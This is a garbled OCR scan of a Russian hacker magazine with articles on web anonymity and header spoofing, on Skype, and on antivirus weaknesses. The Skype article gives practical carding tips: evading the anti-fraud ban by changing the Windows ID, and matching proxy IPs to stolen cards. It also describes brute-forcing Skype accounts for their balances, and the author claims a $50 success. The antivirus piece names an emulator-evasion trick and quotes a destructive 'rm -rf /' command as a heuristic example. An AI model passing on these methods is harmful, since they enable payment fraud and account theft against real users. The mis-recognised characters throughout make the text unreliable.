Причем ты вправе сам указать, из какого ко- 
личества нодов строить цепочки, как часто их 
менять и т.д. По умолчанию сервис принимает 
соединения на 4001 порту, поэтому не забудь 
прописать проксю 127.0.0.1 :4001 в браузере. 

□ Устраиваем маскарад 

Во время каждого посещения веб-страницы 
твой браузер передает массу технической 
информации. Такие компрометирующие 
тебя данные, как локализация ОС, версия 
браузера, часовой пояс, страница, с кото- 
рой был осуществлен переход, передаются 
в так называемых переменных окружениях. 
Их легко отследить, если зайти на сайт ѵѵѵѵѵѵ. 
зііоѵѵтуір.сот. Вся информация как на ладо- 
ни. Замаскироваться под американца легко 
— достаточно установить английскую версию 
винды и выбрать правильный часовой пояс. 
Но в других случаях найти подходящий дист- 
рибутив будет проблематично. Да и вообще, 
сплошь и рядом встречаются ситуации, когда 




> Выбираем достойный сервер с большим количес- 
твом пользователей — это повысит шансы остаться 
полностью анонимным 
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нужно изменить значения других переменных окружения. 
Тут и возникает идея: что если заюзать некий фильтр меж- 
ду сетью и клиентом, который способен изменять НТТР- 
заголовки на любой лад, вводя в заблуждение любого ад- 
мина? В этом нам поможет Осіуззеиз (ѵѵѵѵѵѵ.ѵѵазіеіапсіз.деп. 
пг/осіуззеиз/) — сетевой пакет, впервые продемонстриро- 
ванный на хакерской конференции Эе^соп и созданный 
настоящими профессионалами своего дела. 

Программа представляет собой мощный конструктор 
НТТР-запросов, с возможностью на лету изменять куки, 
ѲЕТ/РОЗТ-запросы, вносить дополнительные параметры, 
вобщем, устраивать полный сетевой беспредел. Осіуззеиз, 
как и предыдущие программы, представляет собой прок- 
си-сервер, который по умолчанию занимает 50000 порт. 
В принципе, аналогичные действия можно провернуть 
с помощью описанной выше Ргіѵоху, но в данном случае 
все намного проще. Все действия осуществляются через 
удобную и понятную 0111-оболочку, а поэтому отпадает 
всякая необходимость заморачиваться с синтаксисом 
правил и фильтров, как это было в случае с Ргіѵоху. И это 
круто. Допустим, тебе требуется подменить ІІзег Адепі (ин- 
формацию о браузере). Для этого щелкой правой кнопкой 
по значку программы в трее, затем выбирай инструмент 
Реѵѵгііег (средство для автоматичной подмены передавае- 
мых серверу параметров). В предложенном окне находит- 
ся список используемых правил: выбираем л ІІзег-АдепІ 
и наблюдаем свойства правила. Принцип прост: Одис- 
сей ищет в передаваемом запросе параметр, указанный 
в поле МаісИ, и заменяет его строкой, заданной в поле 
Реріасе. Поэтому единственное, что 
от тебя требуется, — это вписать зна- 
чения в нужные поля. Чтобы, например, 
прикинуться пользователем с Іпіегпеі 
Ехріогег’ом, достаточно вписать в поле 
Реріасе строку «ІІзег-АдепІ: МогіІІаМ.О 
(сотраііЫе; МЗІЕ 6.0; ѴѴіпсІоѵѵз ЫТ 5.1; 

ЗѴ1)». Аналогичным образом можно 
фильтровать куки (удалять строки Зеі- 
Соокіе), добавлять новые параметры в 
запрос (например, для хитрой аутен- 
тификации на своем сервисе, которая 
будет анализировать именно этот пара- 
метр) и т.д. 

Любые запросы к удаленному серве- 
ру перехватываются, а передаваемые 
в запросе значения переменных лег- 



> Включать/выключать Тог лучше всего с 
помощью дополнительных утилит. В слу- 
чае браузера Ріге^ох — это Т огВиИоп. 

ко корректируются, если в Одиссее активирован режим 
Іпіегсеріог. Он аналогичным образом включается через 
всплывающее меню ярлычка программы в трее. После 
этого попробуй зайти на какой-нибудь сайт. Тут же всплы- 
вает окно с указанием всех параметров, каждый из кото- 
рых легко исправить. Изучи, подправь, что нужно, и жми 
Оопе — теперь все параметры, в том числе исправленные, 
будут переданы на настоящий сервер. 

С помощью Асііѵііу І_од можно четко проанализировать 
общение браузера и удаленного сервера — это еще один 
режим работы программы. Кстати, для каждого из режи- 
мов можно назначить горячую клавишу и быстро вызвать 
нужный из них по хоткею. Это и многое другое настраи- 
вается в опциях программы. Штука поистине мощная, и 
роль подобного инструмента в целях обеспечения безо- 
пасности нельзя недооценивать. Очень часто приходит- 
ся подменять тип используемого браузера в ІІзег Адепі, 
затирать Пеіегег. Мне даже приходилось добавлять в 
запрос поля Х-Рогѵѵагсіег, Ѵіа и Ргоху-соппесі, чтобы за- 
ставить сервер думать, что я работаю через публичный 
прокси-сервер (официальный, с логами и не вызываю- 
щий подозрений). ЦТ 

> Логи Одиссея: общение браузера с 
сервером как на ладони. 




> Используя Тог, ты 
ни в коем случае 
не заносишь свой 
компьютер в список 
тех серверов, что 
используются 
для обеспечения 
анонимности. Это 
осуществляется 
недобровольных 
началах, и если ты 
имеешь подобное 
желание, то читай 
специальный мануал 
— ИДр:/Аог.еА.огд/ 
сІосзАог-сІос-зегѵег. 
ИітІ.еп, 




> Анонимность — за- 
лог твоей собствен- 
ной безопасности, 
а не предлог для со- 
вершения противоза- 
конных действий. 




> На диске ты най- 
дешь все упомянутые 
программы, а также 
видеопримеры их 
использования. 




> На базе ТОР иТОР- 
ЭЫЗ фДр://запсІоз. 
а!И.сх/~ЬасІдег/1огсІпз. 
ИітІ) можно создать 
неплохую базу для 
попе-аЬизе хостинга. 
По дефолту твой сайт 
будет резолвиться по 
домену в зоне .опіоп. 
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ВОЗМОЖНОСТИ $КѴРЕ В ТЕОРИИ И НА ПРАКТИКЕ 1 
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МОЖНО УСПЕШНО ИСПОЛЬЗОВАТЬ КАК В ЗАКОННЫХ, ТАК И НЕ СОВСЕМ ЛЕГАЛЬНЫХ ЦЕЛЯХ 



ИНТЕРЕСНЫМ ФАКТ. ПРАКТИЧЕСКИ КАЖДОМУ ИЗ НАС ХОТЯ БЫ РАЗ В ЖИЗНИ ПРИХОДИЛ ВНУШИТЕЛЬНЫМ СЧЕТ ЗА МЕЖ- 
- , ДУНАРОДНЫЕ РАЗГОВОРЫ. У ОДНИХ ЭТО ПОЛУЧАЛОСЬ ПО ОШИБКЕ НА ТЕЛЕФОННОЙ СТАНЦИИ, ВТОРЫЕ СТАЛКИВАЛИСЬ 

С ЗЛОВРЕДНЫМИ ПРОГРАММАМИ, ТАК И НОРОВЯЩИМИ В ЛЮБОЙ МОМЕНТ ПОЗВОНИТЬ ЗА ГРАНИЦУ, А ТРЕТЬИ НАБИРАЛИ 
НОМЕР, НЕ ЗАДУМЫВАЯСЬ О СТОИМОСТИ ПЕРЕГОВОРОВ. МНОГИЕ ПО-ПРЕЖНЕМУ СЧИТАЮТ, ЧТО ЗВОНКИ ЗА ГРАНИЦУ 
— НЕПОЗВОЛИТЕЛЬНАЯ РОСКОШЬ. НО ЕСЛИ НЕМНОГО ЗАДУМАТЬСЯ, ПОЭКСПЕРИМЕНТИРОВАТЬ И НЕ ПОБОЯТЬСЯ ИСПОЛЫ 
"іЗОВАТЬ В ЭТИХ ЦЕЛЯХ ИНТЕРНЕТ, ТО ПОДОБНЫЕ УСЛУГИ СТАНУТ НЕ ДОРОЖЕ СОТОВОЙ СВЯЗИ. А ПРЕДЛАГАЕМЫЕ СЕРВИСЫ 



Лі'Ѵ 



О Хорошая штука этот 8куре 

Одна из самыхуспешных и раскрученных сис- 
тем для общения голосом через инет являтся 
Зкуре. Сомневаюсь, что она вообще нужда- 
ется в представлении. Все и без того знают: 
обыкновенная аська, но с возможностью 
общения голосом. Симпатичный интерфейс, 
контакт-лист, чат, передача файлов — поч- 
ти полная ее копия, если бы не эта зеленая 
трубочка, позволяющая соединиться с че- 
ловеком из любой точки мира, чтобы просто 
поговорить. Единственное условие — у этого 
к человека тоже должен быть установлен Зкуре. 

707 



Денежки за болтовню никто не возьмет — все 
бесплатно. Но если захочешь позвонить на 
городской или мобильный телефон, то изволь 
заплатить. Правда, даже по нашим скромным 
российским меркам плата совсем неболь- 
шая. Для звонков в популярные направления 
ставка фиксирована и составляет 2 цента за 
минуту разговора. Нравится? А ведь можно не 
только звонить на стационарные телефоны, 
но и принимать с них звонки! 

Используемый Зкур’ом протокол и алгоритмы 
закрыты. Кто знает, что там такого сотворили 
разработчики, но работает вся система на ура. 
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Аудиокодек подобран очень удачно и выдает 
качество звука, сравнимое с обычным телефо- 
ном, но при этом он экономичен и максимально 
заточен под инет. Каждый клиент Зкуре входит 
в большую пиринговую сеть и соединяется с 
другими абонентами напрямую, то есть данные 
в общем случае передаются напрямую, без 
посредника. Это значительно увеличивает ка- 
чество связи и, что важно, снижаеттеоретичес- 
кую вероятность перехвата трафика (впрочем, 
даже перехватив сетевые пакеты, ты будешь 
смотреть на них как баран на новые ворота, так 
как все передается в зашифрованном виде). 








> Телефон из серии 
ЗіплрІурНопе 




> Звонок для проверки качества связи 
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Одно из главных достижений разработчиков в 
том, что прога будет работоспособна в любом 
случае, несмотря на маршрутизаторы, ЫАТ, се- 
рые ІР-адреса, прокси с авторизацией и другие 
пользовательские ограничения. Доступ в Сеть 

— это единственное условие. Тебе даже не 
придется изменять конфигурацию брандмауэ- 
ра, маршрутизатора и любого другого сетевого 
оборудования. Все заработает в лучшем виде. 
Чтобы добиться подобной универсальности, 
приходится использовать довольно сложную 
схему: если существует какое-либо препятс- 
твие для прямого коннекта, то связь осущест- 
вляется при помощи вспомогательного узла. 
Таковыми узлами выступают клиенты с широ- 
ким каналом, имеющие реальный ІР-адрес и 
не закрытые брандмауэром порты. В итоге мы 
имеем цельный безотказный продукт, который 
будет работать везде и всегда, выдавая высо- 
кое качество связи без каких-либо ограниче- 
ний. Казалось бы, что еще надо? 

Но на самом деле, это лишь малая часть того, 
что готовы предложить разработчики. Хо- 
чешь устроить дебаты с друзьями по поводу 
футбола? Нет проблем — организуй конфе- 
ренцию. Из человек эдак трех-четырех. Мож- 
но даже из пяти, но толку от этого немного 

— разобраться в этом бессмысленном оре 
будет очень непросто. Или хочешь увидеть 
собеседника воочию? Тогда функция виде- 
освязи для тебя. Впрочем, все это мелочи в 
сравнении с основными возможностями про- 
граммы: Зкуреіп и ЗкуреОиі. О них мы погово- 
рим подробнее, но сначала я расскажу, как 
пользоваться программой. 

О Проще не придумаешь 

На момент написания статьи в режиме онлайн 



находилось почти 6 миллионов человек (цифре 
с трудом укладывается в голове). Это, пожалуй, 
лучшая гарантия качества продукта. Сложный 
механизм передачи голоса скрыт в недрах 
простой и понятной программы. Все настолько 
продуманно и упрощено, что какие-либо про- 
блемы исключены в принципе. Зкуре является 
полностью кроссплатформенным продуктом 
— ты можешь выбрать версию для ѴѴіпбоѵѵз, 
І_іпих, Мае и Роскеі РС или вообще утилиту 
ЕСЮ (шѵщошп) для звонков с мобильных 
телефонов. Любая из них устанавливается без 
лишнихусилийствоей стороны. Единственное, 
что необходимо, — зарегистрироваться после 
первого запуска. В отличие от 100, Зкуре не 
использует числовые идентификаторы поль- 
зователя (ІІІІЧ’ы) — каждый вправе выбрать 
произвольный псевдоним в системе. 

В адресной книге по умолчанию находится 
один-единственный контакт — тест-звонок 
Зкуре. Передача голоса предъявляет к интер- 
нет-каналу два важных требования: доста- 
точная пропускная способность и минималь- 
ные задержки в передаче сетевых пакетов до 
собеседника. Чтобы проверить, насколько 
твое соединение удовлетворяет обоим крите- 
риям, и реализован тестовый звонок. Прове- 
ряется проще простого. Достаточно вызвать 
тестового абонента и следовать инструкциям 
ответившего робота. Не буду тебя грузить по 
поводу добавления контактов, организации 
конференции, безопасной передачи файлов 
и чата — все реализовано на таком уровне, 
что будет понятно даже младенцу. Интерес- 
нее рассмотреть другие функции, которые 
реально могут пригодиться тебе в легальном 
и нелегальном бизнесе. 

□ ЗкуреОиі 

Эх, если бы мы жили в идеальном мире, на ь 
ших улицах не было бы бездомных собак, ні 



дорогах — пробок, и все говорили бесплаті-ю ч 
через Зкуре... Покаже придется, в большинс- 
тве случаев, звонить на обычные стационар- 
ные и мобильные телефоны, используя услугу 
ЗкуреОиі. Тариф на разговор зависит от вы- 
бранного направления звонка и остается еди- 
ным, независимо от времени суток и дня не- 
дели. Для наиболее популярных стран Зкуре 
установил единый тариф ЗкуреОиі ОІоЬаІ 

— всего 2 цента за минуту разговора. В эту 
группу входят США, все европейские страны, 
а также Питер и Москва. Для менее популяр- 
ных направлений тарифная ставка отличает- 
ся, но редко превышает 5 центов за минуту. В 
любом случае, баснословного счета за услуги 
связи ты не получишь. Хотя бы потому, что в 
Зкуре действует система предоплаты. Если ты 
находишься в Москве, то звоноклучшему дру- 
гу, находящемуся всего в двух минутах езды, 
будет стоить столько же, сколько, если бы он 
находился на конференции в Лондоне, а ты 

— в командировке в Сан-Франциско. Причем 
на определителе номера высвечивается но- 
мер той страны/штата, где находится человек, 
принимающий звонок (так как используется 
самый ближайший до него ѴоІР-шлюз). Теперь 
не проблема позвонить в любой банк, магазин 
ил и другую компанию, чтобы подтвердить свой 
заказ. Для кардеров и прозвонщиков Зкуре 
стал инструментом первой необходимости. 
Пользователям Зкуре также доступна пе- 
реадресация звонков — это еще одна очень 
полезная функция, которая может сделать 
твою жизнь проще. Благодаря ей ты сможешь 
перенаправлять входящие на Зкуре звонки 
либо другому пользователю Зкуре, либо на 
обычныйтелефонный номер. Так что твои дру- 
зья и коллеги смогут звонить тебе через Зкуре 
совершенно бесплатно даже тогда, когда ты 
находишься вдали от компьютера. Но даже в 
этом случае разговор тебе обойдется очень 
дешево: такие звонки оплачиваются по стан- 
дартному тарифу ЗкуреОиі. 

В последней версии Зкуре реализовали фун- 
кцию отправки ЗМЗ-сообщения. Стоимость 
ЗМЗ-ки, к сожалению, довольно велика и ре 




Входящий звонок! Услуга Зкуреіп рабо- 
тает как часы 
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> Все данные легко можно пустить 
через анонимный соке 












ко когда оказывается ниже тарифа обычного 
сотового оператора. Но зато отправлять со- 
общения с компьютера намного быстрее. По 
умолчанию в имени отправителя указывается 
псевдоним, привязанный к аккаунту Зкуре. 
Однако можно использовать и свой настоя- 
щий мобильный номер, пройдя специальную 
процедуру проверки. 

Биллинговая система Зкуре правильно рас- 
познает и бесплатные номерателефонов, ши- 
роко используемых большими компаниями и 
магазинами. На такие номера можно звонить 
совершенно бесплатно, независимо от того, 
где они находятся. В настоящее время Зкуре 
поддерживает бесплатные номера во Фран- 
ции, Польше, Великобритании и США, но в 
скором будущем планирует добавить к этому 
списку и другие страны. 

Теперь внимание! Самое вкусное в том, что 
через Зкуре до конца 2006 года жители США 
и Канады могут звонить внутри своей страны 
налюбые стационарные и мобильныетелефо- 
ны совершенно бесплатно. Тебе достаточно 
ввести в анкету Зкур'а любые данные амери- 
канца и использовать американский ІР — и ты 
сможешь совершать звонки, не платя ни ко- 
пейки. Представляешь, полгода бесплатной 
связи со Штатами — это дорогого стоит! 

0§куреІп 

Зачастую приходится не только звонить, но и 
принимать звонки. Зкуре и в этом случае не 
подведет. Уникальный сервис Зкуреіп поз- 
воляет пользователям не просто принимать 
звонки по какому-то техническому номеру, а 
арендовать лично для себя несколько номеров 
в десятках стран мира. Сам понимаешь, какие 
возможности это предоставляет. Ну, напри- 
мер, если ты занимаешься веб-дизайном или 
программированием, то вполне можешь арен- 
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> Пополняем баланс посредством 
платежной системы ѴѴеЬМопеу 



довать пару телефонов в разных уголках мира 
и опубликовать это на сайте — тем самым су- 
щественно увеличишь имидж своей компании 
в глазах потенциальных клиентов, получишь 
возможность принимать заказы и обговари- 
вать условия работы. Причем никто не заме- 
тит подвоха. Если ты арендовал номер в Нью- 
Йорке, при этом живешь в Москве, то любой 
желающий из этого города может совершен- 
но бесплатно позвонить на него. А Зкуре поза- 
ботится, чтобы звонок был перенаправлен на 
тебя. Этой функцией вовсю пользуются карде- 
ры и всевозможные сервисы по прозвону: во 



> Именно так выглядит мобиль- 
ная версия Зкуре — ЕСЮ 

это тем, что номер телефона находится на рас- 
стоянии в сотни километров от места «твоего» 
проживания. Я пробовал арендовать номер в 
США, Великобритании, Бразилии, Дании, Эс- 
тонии, Финляндии, Франции, Германии, Гон- 
конге, Польше, Швеции и Швейцарии. Но этот 
список не полон. В действительности Зкуре 
прикладывает все усилия для того, чтобы дать 
нам возможность выбирать номера и во мно- 
гих других странах. Но это еще не все. Если на- 
строить переадресацию наобычный телефон, 
то тебе даже не придется использовать Зкуре 
— все звонки ты будешь принимать с обычного 
телефона. Вкупе с анонимной симкой и новым 
телефоном, ІМЕІ-код которого не засвечен в 
логах оператора сотовой связи, получишь 
идеальный инструмент для связи инкогнито. 
Фишка работает превосходно, но имеет один 
небольшой минус: переадресация занимает 
некоторое количество времени, поэтому те- 
лефон реально начинает звонить позже, чем в 
трубке у звонящего появляются гудки. Может 



Если ты арендовал номер в Нью-Йорке, 
при этом живешь в Москве, то любой 
желающий может совершенно бесплатно 
позвонить на него 



время регистрации они вполне могут указать 
реальный номер с подходящим местораспо- 
ложением и ответить на все проверяющие 
звонки. Правда, некоторые антифрод-сис- 
темы подобные ухищрения пытаются предо- 
твратить, пробивая адрес, привязанный к но- 
меру телефона. Поэтому не удивляйся, если 
тебе откажут в регистрации, аргументировав 









получиться, что человек не дождется, пока ты 
возьмешь трубку, и скинет звонок. Впрочем, 
это уже придирки. 

Аренда номера на 1 2 месяцев обойдется в €30, 
а на 3 месяца — €10. Разумеется, тебя никто 
не заставляет платить свои кровные, ведь ты 
всегда можешь воспользоваться американс- 
ким благотворительным фондом :). 
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> На диске ты 
найдешь версии 
Зкуре под разные 
платформы, а также 
альтернативные 
клиенты. 



рос. В любом месте на сайте (и в программе) ты будешь 
встречать надпись «Купить кредиты». Именно эти кредиты 
ты и будешь тратить, оплачивая услуги Зкуре. Перевести 
реальные денежки на виртуальный счет очень просто — 
существует масса вариантов. Можно пополнить баланс на 
официальном сайте ѵѵѵѵѵѵ. зкуре .сот кредиткой или через 
платежные системы РауРаІ и МопеуЬоокегз. Но, по-моему, 
намного удобнее воспользоваться услугами ресселеров и 
приобрести кредиты Зкуре за привычные нам 
ѴѴеЬМопеу, Е-ОоІсІ, Реібагб. Такие 
услуги, например, предо- 
ставляет популярный 
автоматический 



обменник: ѵѵѵѵѵѵ.гоЬохсбапае.сот . Пополнение произ- 
водится полностью автоматически, мгновенно, причем 
на произвольную сумму. Кроме этого, пользователи 
Зкуре могут совершенно бесплатно пересылать друг 
другу деньги на счет, поэтому, в случае чего, можно 
попросить деньги в долг. Конечно, Зкуре можно легко 
скардить (подробности во врезке), но цены на связь на- 
столько смешные, а паленые аккаунты настолько быст- 
ро лочат, что разумнее пополнить баланс легально. Да и 
совесть будет чиста. 



> В некоторых 
случаях (например, 
редких направле- 
ниях для звонков) 
выгоднее использо- 
вать альтернативу 
Зкуре’а — Оігто 



О ЕСЮ — Зкуре в мобильном 

Не так давно канадская компания Ецо Соттипісайопз 
( уууууу.едо.сот ) объявила о выходе тестовой версии про- 
граммы ЕСЮ, полном аналоге Зкуре’а, но для мобильного 
телефона. Все контакты на мобильную платформу пере- 
носятся с компьютера, а контакт-лист постоянно обнов- 
ляется через инет. С каждым из этих контактов можно 
просто початиться, что довольно скучно, или же устано- 
вить полноценную голосовую связь, как если бы ты ра- 
ботал со Зкуре за обычным компьютером. Вообще, ЕСЮ 
нив чем не ограничивает юзера. В системе по-прежнему 
можно совершать как внутренние, так и внешние звон- 



( ѵѵѵѵѵѵ.аі^торгоіесі. 
сот ). Система имеет 
аналогичные воз- 
можности и нередко 
предоставляет более 
удачные тарифы. 
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КАРДИНГ 8 КУРЕ 

Помнится, когда Зкуре только поя- 
вился, скардить кредиты было проще 
простого. Сейчас же сервис прина- 
длежит компании ЕЬау — и методы 
антифрода существенно ужесточились. 
Впрочем, их все равно можно обойти. 
Если система определяет, что аккаунт 
нелегальный, то бан устанавливается 
на идентификатор винды. Это довольно 
необычный ход, который незнающего 
человека может ввести в ступор. Какие 
бы хорошие соксы и ѴРЫ хакер ни 
использовал, какое бы системное время 
ни устанавливал — все попытки купить 
кредиты будут заканчиваться неуда- 
чей. Однако решение проблемы очень 
простое. Нужно лишь изменить иден- 
тификатор винды с помощью утилиты 
Ю ВІазіег РІиз ( ѵѵѵѵѵѵ.іаѵасооізойѵѵаге. 
сот/ісІЫазіег.ІіітП . После этого все 
должно пойти как по маслу. Хорошо, 
если процессинговая система думает, 
что в качестве браузера использует- 
ся Іпіегпеі Ехріогег. Заставить ее так 
думать можно при помощи утилиты 
РМОЗСИапде ( Нйр://деп1 1 .пагосі.ги ). 
Есть еще несколько нюансов. По 
непонятным причинам намного лучше 
проходят европейские кредитные карты 
— аккаунты в этом случае держатся зна- 
чительно дольше. Хорошо зарекомен- 
довала себя оплата «палкой» (РауРаІ), 
но в этом случае нужно позаботиться, 
чтобы используемый соке имел ІР-адрес 
из привязанного к карте страны и штата. 
Кстати, в случае с РауРаІ действует 
бонусная программа, по которой на счет 
начисляются дополнительные единицы 
кредитов. То есть, оплатив $10, я полу- 
чил на счет все $13. Следующий платеж 
аннулировали, но 3 бонусных бакса так 
и осталось на счету. Глюк или нет — не 
знаю, но все равно приятно. 

Вся эта информация указана чисто в 
ознакомительных целях. Никогда не 
используй ее на практике: оплачивать 
подобный сервис легально под силу 
каждому, поэтому незачем рисковать и 
терять драгоценное время! 




ехрІаіпесШтІ — подробное 
объяснение работы Зкуре. 
ѵѵѵѵѵѵ.едо.сот — официаль- 
ный сайт программы ЕСЮ. 
ѵѵѵѵѵѵ.зкѵресІиЬ.ги — круп- 
нейший сайт по Зкуре в 
России. 





> Прямой перебор паролей дает свои 
результаты: с грамотно составленным 
словарем я сбрутил аккаунт на $50 




> В последней версии Зкуре появилась 
возможность отправлять ЗМЗ 



ки нестационарные и мобильныетелефоны по 
тарифам ЗкуреОиі. Единственноеусловиедля 
пользователей нового сервиса — поддержка 
трубкой технологии ^МЕ фаѵа2 РІаІіогт, 
Місго ЕсІШоп). Начинать работу с программой 
можно только после того, как ты создал учет- 
ную запись в системе. Причем дополнительно 
нужно зарегистрировать еще и специальный 
идентификатор. Процедура выполняется че- 
рез компьютерную версию программы ЕСЮ 
или же на официальном сайте ѵѵѵѵѵѵ.едо.сот . 
После этого можно инсталлить ЕСЮ на теле- 
фон и приступать к работе. 

Понятно, что для голосовой связи тормозного 
ОРРЗ обычно недостаточно, поэтому разра- 
ботчики рекомендуют использовать ЕСЮ с 
сотовыми операторами третьего поколения 
(30) или же теми, кто поддерживает стандарт 
ЕЭОЕ. Ряд трубок, на который возможно ус- 
тановить программу, самый широкий: факти- 
чески подойдет любая современная модель 
Зопу Егісззоп, ІЧокіа, Моіогоіа. Но, на всякий 
случай, лучше уточнить на сайте. 

Теперь о том, как программа работает. В 
боевых условиях были получены вполне 
ожидаемые результаты. Обычного ОРРЗ-со- 
единения для работы мобильного Зкур’а не 
хватает — вместо комфортного разговора 
получилась голосовая мешанина и постоян- 
ные заикания. В случае с ЕЭОЕ все работает 
на очень приличном уровне, однако исполь- 
зовать подобную связь довольно накладно. 
Трафик пока еще очень дорогой, а расход 
немаленький. Поэтому если тебе нужно толь- 
ко принимать звонки, то дешевле восполь- 
зоваться переадресацией, реализованной в 

І Зкуре по умолчанию. 

О Все можно взломать 

Как и для любой другой программы, исполь- 
зующей аутентификацию пользователей 
I в сети, существует брутфорсер АсІѵапсесІ 

Т - 



Зкуре ВшЫогсе ( ІіІІрѴЛогит.азесІіка.ги/ 
5Іпоѵѵ1ІігеасІ.рІір?р= 199729 ). Эта простень- 
кая, но грамотно написанная тузла вполне 
работоспособна и помогла найти мне аккаунт 
с $50 на счету. Правда, ждать пришлось до- 
вольно долго. Дело в том, что перебор паро- 
лей осуществляется с использованием 35І_, 
что значительно замедляет скорость. Прок- 
си к программе не нужны, поскольку сервер 
Зкуре не ограничивает количество попыток 
соединения с одного ІР и количество автори- 
заций на один аккаунт. Даже при частых по- 
пытках логина с одного ІР-адреса ни аккаунт, 
ни адрес не блокируется. В прогу необходимо 
загрузить файл вида Іодіп;раззѵѵогсІ, выбрать 
файл для сохранения, период автосохране- 
ния, количество одновременных потоков и 
нажать кнопочку ЗіагІ :). Во время работы про- 
граммы ты будешь видеть подробный отчет, 
отображающий состояние сканирование. 
Поскольку на аккаунтах частенько лежат де- 
нежки, которые можно пересылать друг дру- 
гу, то взлом юзеров скайпа, вероятно, скоро 
войдет в моду, как когда-то угон асек. 

О Резюмирую 

Зкуре — многофункциональное и доступное 
средство общения, которое можно исполь- 
зовать совершенно по-разному. Кто-то будет 
общаться с бывшими одноклассниками, ко- 
торые живут в США, кто-то устраивать кон- 
ференции и обсуждать рабочие вопросы, 
а кто-то, что очень нехорошо, будет делать 
большиеденьги.воспользовавшисьуслугами 
программы, обводя вокруг пальца антифрод 
службы банков и интернет-магазинов. В лю- 
бом случае, стоит взять Зкуре на вооружение 
и не бояться обходить его стороной. □С 
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ВСЕ ВОЗМОЖНОСТИ 
ДЛЯ ОТДЫХА 
И РАЗВЛЕЧЕНИЙ 



Используя новейший двухъядерный процессор ІпіеІ® Репііит® О 
персональный компьютер ФРОНТ Т-90 (404) предоставляет Вам больше 
вычислительных ресурсов, позволяя по-настоящему насладиться всеми 
достижениями новейших мультимедиа-программ. 




Репііит* й 

іпзіде™ 



Два ядра. 
Делай больше. 







ФРІНТ 

ѵѵѵѵѵѵ.ТгопІрс.ги 
+ 7 ( 495 ) 234-9049 



технопогия 

ПОБЕОЫ 



Обозначения ВиппуРеорІе, Сеіегоп, Сеіегоп Іпзісіе, Сепігіпо, логотип Сепігіпо, СЫрз, Соге Іпзісіе, Ріаіодіс, ЕІЬегЕхргезз, ЕТОХ, ЕІазНЕІІе, І386, І486, І960, ІСОМР, ІпзІапІІР, ІпіеІ, логотип ІпіеІ, ІпІеІ386, ІпІеІ486, ІпІеІ740, ІпІеЮХ2, ІпІеЮХ4, ІпІеІ5Х2, ІпіеІ Соге, ІпіеІ Іпзісіе, 
логотип ІпіеІ Іпзісіе, ІпіеІ. Ьеар аЬеасІ., логотип ІпіеІ. 1_еар аЬеасІ., ІпіеІ ІЧеІВигзІ, ІпіеІ ІЧеІМегде, ІпіеІ ІЧеІЗІгисІиге, ІпіеІ ЗіпдІеОгіѵег, ІпіеІ ЗреесіЗІер, ІпіеІ ЗІгаІаЕІазЬ, ІпіеІ Ѵііѵ, ІпіеІ ХЗсаІе, ІРЫпк, Ііапіит, Ііапіит Іпзісіе, МС5, ММХ, логотип ММХ, логотип Оріітігег, 
ОѵегОгіѵе, Рагадоп, РОСНагт, Репііит, Репііит II Хеоп, Репііит III Хеоп, Регіогтапсе аі Ѵоиг СоттапсІ, Репііит Іпзісіе, зкоооі, ЗоипсІ Магк, ТЬе Сотриіег Іпзісіе., ТНе Зоигпеу Іпзісіе, ѴТипе, Хеоп и Хеоп Іпзісіе являются товарными знаками, либо зарегистрированными 
товарными знаками, права на которые принадлежат корпорации ІпіеІ или ее подразделениям на территории США и других стран. 







,КРИС КАСПЕРСКИ 



на помойку 



НЕКОТОРЫЕ ВОСПРИНИМАЮТ АНТИВИРУС КАК НЕОТЪЕМЛЕМУЮ ЧАСТЬ ОПЕРАЦИОННОЙ СИСТЕМЫ И ПРОСТО НЕ МЫС-| 
ІЛЯТ СВОЕ СУЩЕСТВОВАНИЕ БЕЗ ЗАЩИТНЫХ ПАКЕТОВ ОТ РАЗНЫХ ПРОИЗВОДИТЕЛЕЙ, СВОБОДНО ПРОПУСКАЮЩИХ Н 
ЗАРАЗУ, НО ВЫЗЫВАЮЩИХ ЖУТКИЕ ТОРМОЗА И ЦЕЛЫЙ ВОРОХ КОНФЛИКТОВ, ВПЛОТЬ ДО ВЫПАДЕНИЯ В ВЗСЮ. САМЫЙ 
ЛУЧШИЙ АНТИВИРУС — ЭТО САМА ОСЬ! НУЖНО ТОЛЬКО НАУЧИТЬСЯ ПРАВИЛЬНО ЕЮ ПОЛЬЗОВАТЬСЯ 



рс_гопе 



О Антивирусы 
— за гранью возможного 

Антивирусы в настоящее время практичес- 
ки полностью утратили былую значимость 
и усиленно пытаются отойти от пропасти, на 
дне которой они находятся. Все это потому, 
что вирусы, заражающие исполняемые фай- 
лы, за последние несколько лет фактически 
перевелись. К тому же запретить запись в ис- 
полняемые файлы средствами операционной 
системы намного проще, дешевле, быстрее и 



надежнее, чем устанавливать антивирусный 
пакет. И уж совсем бессмысленно пытаться 
лечить зараженные объекты, ведь в любой 
момент их можно переустановить с дистри- 
бутивной копии, хранящейся на СО-Р/РѴѴ или 
скачанной из Сети. 

Антивирусный монитор, следящий за всеми 
создаваемыми/открываемыми файлами и 
проверяющий их налету, — это дополнитель- 
ные тормоза (подчас очень значительные): 
конфликты, критические ошибки, голубые 



экраны смерти и прочий ничем не оправдан- 
ный геморрой. Вся проблема в том, что анти- 
вирус может ловить только те вирусы, о кото- 
рых знает, а вирусы сейчас пишут все кому 
не лень, так что даже при экстраординарной 
степени оперативности никакой гарантии, 
что вся зараза будет распознана, у нас нет. 
Более того, вирус, упакованный слегка под- 
правленной версией крутого протектора, 
имеет 100% шансы остаться незамеченным! 
Сложные протекторы уже не распаковыва- 
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АНТИВИРУС НА ПОМОЙКУ 



ются на эмуляторе ЦП, и для их снятия тре- 
буется статический распаковщик, входящий 
в «движок» антивирусной базы и справляю- 
щийся только со строго конкретными верси- 
ями протекторов и очень болезненно относя- 
щийся даже к незначительным изменениям 
структуры упакованного файла. Да что там 
структура! Обычно бывает достаточно внед- 
рить в точку входа щтр на инструкцию, неиз- 
вестную эмулятору (например, что-нибудь из 
набора 55Е/55Е2), и антивирус идет лесом, 
поскольку переменная длина х86 инструкций 
не позволяет ему определить начало следую- 
щей машинной команды! 

Впрочем, даже если антивирусу удастся по- 
бороть упаковщик и передать эвристику, рас- 
пакованный код никаких вирусных признаков 
все равно там низа что не обнаружит, ну разве 
что это будет пионерский вирус. Наличие не- 
зашифрованных текстовых строк с ключами 
реестра, ответственными за автозапуск, имен 
исполняемыхфайловантивирусныхпрограмм, 
команд в стиле «гт -г!/» с высокой степенью 
указывает на зловредную программу, но их 
очень легко зашифровать. Еще эвристик мо- 
жетанализироватьтаблицуимпортаиаргумен- 
ты, передаваемые функции ОеіРгосАсІсІгезз. 
